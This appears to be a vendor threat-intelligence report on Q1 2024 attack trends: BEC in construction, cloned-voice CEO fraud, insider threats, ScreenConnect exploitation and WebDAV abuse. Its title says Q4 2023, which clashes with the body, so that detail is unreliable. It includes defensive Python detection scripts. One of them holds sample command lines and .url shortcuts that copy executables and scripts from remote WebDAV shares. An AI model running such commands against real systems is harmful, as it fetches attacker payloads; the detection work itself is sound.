Q4 2023 Cyber Threat Landscape Report: Threat Actors Breach the Outer Limits
by Laurie Iacono, Keith Wojcieszek, George Glass
Wed, May 22, 2024
In Q1 2024, we saw an evolution in the techniques used by attackers, some of which may point to longer-term trends in the variety and sophistication of attacks faced by organizations. In phishing in particular, we saw SMS and voice-based lures being used, which raises concern that deepfakes and other AI-type technologies could further increase the effectiveness of phishing attacks.
In the same vein, one insider threat case investigated by Kroll this quarter involved employee impersonation, another area where AI-type technology could be especially effective. Kroll's investigation into the ScreenConnect CVEs this quarter also shows attackers exploiting newly disclosed vulnerabilities faster than before.
Two industries are the focus in Q1 2024: technology/telecoms and construction. The former saw significant growth in insider threat cases, potentially a result of increased supply chain risk. The latter saw steady growth in email compromise over the past year, which could be driven by the nature of work in the industry: employees are often working from mobile devices or on site, where they may be more susceptible to attack.
The sectors targeted by threat actors in Q1 2024 were consistent with previous quarters. Professional services remained the focus for attacks, accounting for 24% of cases, while manufacturing continued to rank at second place, with 13% of cases, followed by financial services and health care at 9% and 8% respectively.
Incident Response Cases in the Construction Industry Over the Past Five Quarters
In Q1 2024, attacks against the construction sector accounted for nearly 6% of all Kroll incident response engagements. This was double the sector's previous peak of 3% in Q1 2023. Attacks against the construction sector are most likely to be some form of business email compromise (BEC). A review of cases indicates that carefully crafted phishing lures designed to mimic document-signing services are a common way to socially engineer victims into giving up their credentials and, in some cases, completing the multi-factor authentication (MFA) step on the attacker's behalf via an attacker-in-the-middle (AitM) phishing page that proxies the real login and captures the resulting authenticated session.
Construction firms may be targeted in this way for several different purposes. One is financial gain, through social engineering campaigns that redirect vendor payments to a fraudulent bank account.
In other cases, the construction company is used as the pivot point for downstream attacks. Here, actors use unauthorized access to a user's email inbox to phish the company's clients and vendors, for example by sending fake document-signature requests to multiple vendors in order to harvest those vendors' credentials and extend their access.
These attacks may be rising because work in the industry involves many digital sign-ins from mobile devices on site. An employee receiving an email on the road may be less vigilant about the signs of a fraudulent message and therefore more likely to fall for a phishing lure.
In Q1 2024, Kroll observed a slight increase in email compromise, with it remaining the most common type of threat incident. Interestingly, the percentage of ransomware cases declined in Q1, potentially as a result of disruptions affecting the large ransomware-as-a-service variants such as LockBit and BlackCat.
Phishing was the most likely vector for email compromise incidents. While phishing has typically been synonymous with an email message, Kroll observed in Q1 that actors continued to evolve their tactics and introduce others, such as SMS lures and voice phishing, which appear to be rising in popularity.
Many firms have put controls in place to reduce the likelihood of BEC, including verbal verification with C-level personnel (such as the chief executive or chief financial officer) for requests that arrive strictly by email. Although these were intended to add an extra layer of authentication, Kroll has observed cases in which actors are likely using commonly available deepfake tools to clone the voices of CEOs and CFOs.
In one such case, Kroll noted repeated voicemail messages simulating the CEO's voice to authorize fraudulent transactions. The messages were upwards of five minutes long, potentially to increase the likelihood of the scam being actioned. While employees may be more suspicious of a short message cloning the CEO's voice, a longer message, built from publicly available recordings of the CEO, arguably seems more legitimate. Such attempts highlight the increased risk that deepfakes and other AI-type technologies pose to organizations.
A review of Kroll engagements for insider threat revealed insights into the sectors most vulnerable to such attacks. In Q1, Kroll observed that cases impacting the technology/telecom sector were most likely to be insider threat cases. With most technology providers working with multiple downstream customers, an insider with access to multiple technology providers may have the ability to cascade malicious activity to clients, posing the risk of a supply chain attack.
For the first time, we also split out the proportion of insider threat engagements deemed to be intentional versus those deemed to be unintentional. In 90% of cases, Kroll observes the insider threat being intentional, and therefore arguably malicious in intent, as opposed to accidental. This highlights the importance of insider threat not being overlooked as a threat incident type by companies.
In one case observed by Kroll in Q1, an employee onboarded by a third-party contracting firm began displaying suspicious behavior. The employee, who had been given access to confidential and sensitive information due to their job role, frequently delayed communication and stopped communicating altogether once more serious questions were raised about the legitimacy of their identity.
In this case, Kroll was able to help the company identify that the individual was accessing the network from a different country to the one they claimed to reside in. Kroll also helped identify the data at risk associated with the employee.
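The country mismatch in the case above is a signal that can be checked routinely rather than only during an investigation. The script below is an added example, not Kroll's tooling or anything the report describes: it compares each user's sign-in source countries (as a geolocation service would tag them) against the country of residence declared at onboarding, and also notes when a user's "home-country" sign-ins all arrive through known VPN or proxy exits, a common way to make a remote login look local. The sign-in records, the declared-residence table, the proxy flag and the thresholds are all constructed assumptions.

```python
"""Flag accounts whose sign-ins contradict the residence declared at onboarding.
Added example; the log format, residence table and thresholds are assumed."""
from collections import Counter, defaultdict

# Constructed sign-in records: (user, source country from IP geolocation,
# whether the source IP is already tagged as a commercial VPN/proxy exit).
SIGNINS = [
    ("contractor.a", "US", False),
    ("contractor.a", "BR", False),
    ("contractor.a", "BR", False),
    ("contractor.a", "BR", False),
    ("contractor.b", "US", True),
    ("contractor.b", "US", True),
    ("contractor.b", "US", True),
    ("contractor.b", "US", False),
    ("employee.c", "DE", False),
    ("employee.c", "DE", False),
    ("employee.c", "DE", False),
]

# Constructed HR/onboarding data: declared country of residence per account.
DECLARED = {"contractor.a": "US", "contractor.b": "US", "employee.c": "DE"}


def flag_residence_mismatch(signins, declared, min_sessions=3, ratio=0.5):
    """Return {user: [reason, ...]} for users worth a closer look.

    Two signals are produced:
      * at least `ratio` of a user's sign-ins come from countries other than
        the declared one (ignoring users with fewer than `min_sessions`);
      * at least `min_sessions` sign-ins from the declared country arrive via
        a known VPN/proxy exit, i.e. the "local" location may be faked.
    """
    by_user = defaultdict(list)
    for user, country, via_proxy in signins:
        by_user[user].append((country, via_proxy))

    findings = {}
    for user, sessions in by_user.items():
        if user not in declared or len(sessions) < min_sessions:
            continue
        home = declared[user]
        countries = Counter(c for c, _ in sessions)
        foreign = sum(n for c, n in countries.items() if c != home)
        proxied_home = sum(1 for c, p in sessions if c == home and p)

        reasons = []
        if foreign / len(sessions) >= ratio:
            reasons.append(
                f"{foreign}/{len(sessions)} sign-ins outside declared "
                f"country {home}: {dict(countries)}"
            )
        if proxied_home >= min_sessions:
            reasons.append(
                f"{proxied_home} sign-ins from {home} via known VPN/proxy exits"
            )
        if reasons:
            findings[user] = reasons
    return findings


if __name__ == "__main__":
    for user, reasons in flag_residence_mismatch(SIGNINS, DECLARED).items():
        print(user)
        for r in reasons:
            print("   ", r)
```

Both signals are meant to open an HR conversation, not to act as proof on their own: legitimate travel and corporate VPNs will trigger them, so the proxy list and the thresholds need to be tuned to the organization's own baseline.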
Although Kroll did not observe the use of deep fake technology in enhancing the employee impersonation, this case does highlight how sophisticated AI technology could result in more convincing campaigns of this type.
The AKIRA ransomware group took the lead in Q1 2024 with 27% of cases and LOCKBIT slipped into second place with 15% of cases. We also saw a significant drop in PLAY ransomware group activity, from 11% of cases in Q4 2023 to 5% in Q1 2024.
Phishing remained the top initial access vector across all threat incident types. For events where phishing was the main initial access vector, the threat type was most likely to be email compromise.
Kroll continued to observe an increase in attacks that began with social engineering, and also saw increases in incidents that started with threat actors exploiting public-facing applications, such as Cisco Adaptive Security Appliance (ASA) virtual private networks and the ScreenConnect remote management tool. Attacks targeting known vulnerabilities were most likely to result in a ransomware incident.
On February 19, software firm ConnectWise notified clients of two vulnerabilities (CVE-2024-1708 and CVE-2024-1709) affecting on-premises versions of its remote management tool, ScreenConnect (versions 23.9.7 and prior). CVE-2024-1709 allows an unauthenticated attacker to bypass authentication and create an administrative account; CVE-2024-1708 is a path traversal flaw. Once an admin account is created, the attacker holds system administrator privileges over the ScreenConnect instance.
In the immediate aftermath of the publication, Kroll responded to many engagements in which attackers exploited this vulnerability to gain a foothold in victims' networks. On the managed detection and response (MDR) side, Kroll was able to identify and quarantine exploitation activity before it progressed to a full-blown incident. In at least one case, Kroll identified a file containing a new malware, TODDLERSHARK, related to the Kimsuky threat actor group.
On the incident response side, Kroll observed that a majority of its ScreenConnect cases had an initial access date of February 21, indicating that actors were exploiting the vulnerability within 48 hours of the original announcement.
Based on a review of these cases, Kroll observed a wide range of threat actors leveraging the vulnerability. Cases occurring within the first five days of publication were more likely to be associated with larger-scale threat actor groups. Three weeks on from the publication date, fewer cases were observed, likely due to widespread patching, and the cases observed during this later period were more likely to be associated with lone-wolf actors or less sophisticated groups.
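A 48-hour exploitation window leaves little room for a manual patch review, so the affected-version rule and the timeline above are worth encoding. The script below is an added example, not Kroll's or ConnectWise's code: it parses ScreenConnect version strings, flags hosts on 23.9.7 or earlier (it assumes 23.9.8 is the first fixed release), orders internet-facing hosts first, and buckets an observed initial-access date into the cohorts the report describes (first five days, up to three weeks, later). The host inventory and its version strings are constructed.

```python
"""Triage ScreenConnect hosts against the February 2024 advisory and bucket
initial-access dates into the report's cohorts. Added example; inventory and
the 23.9.8 fixed-version assumption are not from the report."""
from datetime import date

ADVISORY_DATE = date(2024, 2, 19)   # ConnectWise notification date
FIRST_FIXED = (23, 9, 8)            # assumed first fixed release; 23.9.7 and prior affected


def parse_version(text):
    """'23.9.7.8817' -> (23, 9, 7, 8817). Raises ValueError on junk input."""
    return tuple(int(part) for part in text.strip().split("."))


def is_affected(version):
    """True when the major.minor.patch prefix is below the first fixed build."""
    return parse_version(version)[:3] < FIRST_FIXED


def exposure_days(initial_access):
    """Days between the advisory and the observed initial access (negative = before)."""
    return (initial_access - ADVISORY_DATE).days


def cohort(initial_access):
    """Bucket an initial-access date the way the report groups its cases."""
    days = exposure_days(initial_access)
    if days < 0:
        return "pre-advisory"
    if days <= 5:
        return "first-five-days"
    if days <= 21:
        return "weeks-two-to-three"
    return "late"


# Constructed inventory: hostname, reported version, whether it is reachable
# from the internet (the latter decides patch order).
INVENTORY = [
    {"host": "rmm-prod", "version": "23.9.7.8817", "internet_facing": True},
    {"host": "rmm-lab", "version": "23.9.8.8811", "internet_facing": False},
    {"host": "rmm-old", "version": "22.8.9", "internet_facing": True},
    {"host": "rmm-new", "version": "24.1.1", "internet_facing": True},
]


def triage(inventory):
    """Return the affected hosts, internet-facing ones first, then by name."""
    affected = [h for h in inventory if is_affected(h["version"])]
    return sorted(affected, key=lambda h: (not h["internet_facing"], h["host"]))


if __name__ == "__main__":
    for h in triage(INVENTORY):
        exposure = "INTERNET-FACING" if h["internet_facing"] else "internal"
        print(f"{h['host']:10s} {h['version']:14s} {exposure}")
    print("case on 2024-02-21 falls in cohort:", cohort(date(2024, 2, 21)))
```

Because the comparison works on the major.minor.patch prefix, build numbers after the third component are ignored; a two-component string such as "23.9" compares as older than 23.9.8, which is the conservative choice for triage.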
Kroll actively tracks malware command-and-control (C2) infrastructure, submissions to public sandboxes, and active incident response (IR) and MDR case data to generate lists of the most active malware strains for comparison. In Q1, the most notable changes were a drop in activity from QAKBOT and PIKABOT. Kroll's Cyber Threat Intelligence team believes this is due to a shift in KTA248 behavior toward other malware strains, such as ICEDID and ICENOVA (LATRODECTUS).
Top 10 Malware Strains—Q1 2024
In Q1, Kroll observed an uptick in threat actors leveraging WebDAV for remote file access from Windows. WebDAV is an extension of the Hypertext Transfer Protocol (HTTP) that gives users and web services a standard way to create, modify and move documents on a remote server, and it allows multiple users to work simultaneously on the same content.
Kroll observed actors leveraging vulnerabilities in Microsoft SmartScreen (CVE-2023-36025 and CVE-2024-21412) that allow an attacker to deliver an internet shortcut (.url file) with an embedded malicious URL designed to bypass security controls. Kroll observed multiple campaigns using the technique to distribute several malware variants, including TIMBERSTEALER, DARKME, DARKGATE and ICENOVA.
WebDAV has a long history of security issues, particularly where it meets Windows file-sharing technology. Previously we have seen issues such as the leaking of users' NT LAN Manager (NTLM) hashes, and more recently the SmartScreen bypass vulnerabilities above. These vulnerabilities are not the only reason WebDAV is attractive to an attacker. Because it is integrated into Windows, its use is harder to spot than a suspicious process making its own network connections: with WebDAV, the Windows file-sharing stack owns the actual network interaction, while the malicious process appears merely to be accessing a file. WebDAV also gives an attacker a simple means of remote file transfer with minimal code, as even a basic batch script can download a file with a copy command against a UNC path. It is recommended, where possible, to block WebDAV traffic at the perimeter.
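The two artifacts the preceding paragraphs describe, an internet shortcut whose URL points at an attacker's WebDAV share and a command line that copies a file from such a share, both leave recognisable strings behind: the Windows WebDAV redirector is addressed with a host suffix such as @SSL or @80 and a DavWWWRoot path component, and a file: URL in a .url file that names a remote host is itself unusual. The scanner below is an added example, not Kroll's detection content: it parses the INI-style .url format, extracts UNC-style tokens from process command lines, and reports which WebDAV indicators each target carries. The shortcut files, command lines and IP addresses are constructed, and the indicator list is this example's own choice.

```python
"""Hunt for WebDAV-based delivery in .url internet shortcuts and process
command lines. Added example; samples and indicator tags are constructed."""
import re

# Constructed .url files as they would be read from disk. The first two point
# at a remote WebDAV share (one chains to a second .url, the other straight to
# an executable); the third is a benign web link.
SHORTCUTS = {
    "invoice.url": "[InternetShortcut]\r\nURL=file://203.0.113.5@80/DavWWWRoot/share/invoice.url\r\nIconIndex=1\r\n",
    "payload.url": "[InternetShortcut]\r\nURL=file://\\\\203.0.113.5@SSL\\DavWWWRoot\\bin\\run.exe\r\n",
    "readme.url": "[InternetShortcut]\r\nURL=https://example.com/docs\r\n",
}

# Constructed process command lines: a WebDAV copy, a plain SMB mapping and a
# PowerShell pull over WebDAV.
COMMAND_LINES = [
    r'cmd.exe /c copy \\203.0.113.5@80\DavWWWRoot\tools\agent.exe %TEMP%\agent.exe',
    r'net use Z: \\fileserver\public',
    r'powershell.exe -c "cp \\198.51.100.7@SSL\DavWWWRoot\u.js $env:TEMP"',
]

# host@SSL or host@<port> directly after a UNC/URL separator
PORT_MARKER = re.compile(r"[\\/]{2}[\w.\-]+@(?:ssl|\d{1,5})(?=[\\/]|$)", re.I)
# host part of a file: URL, whatever mix of slashes the author used
FILE_URL_HOST = re.compile(r"^file:[\\/]{2,}([^\\/]+)", re.I)
# a UNC-looking token (optionally file:-prefixed) inside a command line
UNC_TOKEN = re.compile(r"(?:file:)?[\\/]{2}[^\s\"']+", re.I)
LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}
SUSPICIOUS_EXT = {".url", ".lnk", ".exe", ".dll", ".js", ".vbs", ".hta",
                  ".msi", ".bat", ".cmd", ".scr"}


def parse_internet_shortcut(text):
    """Minimal parser for the INI-style .url format; returns the URL value
    from the [InternetShortcut] section or None."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "url":
                return value.strip()
    return None


def webdav_indicators(target):
    """Return indicator tags for one URL or UNC path (empty list = nothing seen)."""
    reasons = []
    if PORT_MARKER.search(target):
        reasons.append("webdav-port-marker")
    if "davwwwroot" in target.lower():
        reasons.append("davwwwroot")
    m = FILE_URL_HOST.match(target.strip())
    if m:
        host = m.group(1).split("@")[0].lower()
        if host not in LOCAL_HOSTS and not re.fullmatch(r"[a-z]:", host):
            reasons.append("file-url-remote-host")
    last = re.split(r"[\\/]", target.split("?")[0].rstrip("\\/"))[-1].lower()
    ext = "." + last.rsplit(".", 1)[1] if "." in last else ""
    if ext in SUSPICIOUS_EXT:
        reasons.append("remote-target-" + ext[1:])
    return reasons


def scan_shortcut(text):
    """(url, indicators) for one .url file's contents."""
    url = parse_internet_shortcut(text)
    return url, (webdav_indicators(url) if url else [])


def scan_command_line(cmd):
    """{unc_token: indicators} for every flagged UNC-style token in a command line."""
    hits = {}
    for token in UNC_TOKEN.findall(cmd):
        reasons = webdav_indicators(token)
        if reasons:
            hits[token] = reasons
    return hits


if __name__ == "__main__":
    for name, body in SHORTCUTS.items():
        print(name, "->", scan_shortcut(body))
    for cmd in COMMAND_LINES:
        print(cmd[:40], "->", scan_command_line(cmd))
```

A plain SMB mapping such as the net use line produces no indicators, which is deliberate: ordinary UNC paths are everywhere in an enterprise, whereas the @port suffix and DavWWWRoot marker are specific to the Windows WebDAV redirector. On Windows that redirector is the WebClient service, so disabling it or blocking its outbound traffic on hosts that do not need WebDAV complements the perimeter block recommended above.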
One of the most effective mitigations against deepfakes and other AI-enabled attacks is to improve detection of them, and security teams should make recognizing them part of their training.
For Pre-Recorded Deepfakes
For Live Deepfakes
For AI-Enabled Deepfakes
Kroll's findings for the first quarter of 2024 highlight the value of a broad cyber protection strategy. From familiar security foes such as malware to newer ones like deepfakes, the trends observed throughout the quarter show that cyber threats of many types are now the norm rather than the exception for most industries. Organizations need a cyber strategy that takes them from building resilience to these varied threats, through threat hunting and detection, to complete response and recovery.
The increase in insider threats noted this quarter means that businesses must be prepared to tackle the threat from within as well as an increasingly varied set of external risks. At a time when vulnerabilities are exploited by attackers ranging from nation states to solo actors, the threat landscape is becoming harder to navigate. As threat actors continue to adopt new approaches, so must organizations in response. Faced with the growing AI challenge, organizations can no longer rely on purely reactive or one-dimensional approaches to security; their vigilance must translate into a strategy that proactively addresses every layer of the attack surface.
With AI, deepfake technology, SMS lures and similar techniques highly likely to give threat actors even more opportunities in the near future, companies need to keep building a comprehensive cyber protection strategy. Adapting in this climate means working with a security partner capable of scaling up, with the breadth of vision and solutions to keep organizations ahead at every stage of the threat lifecycle.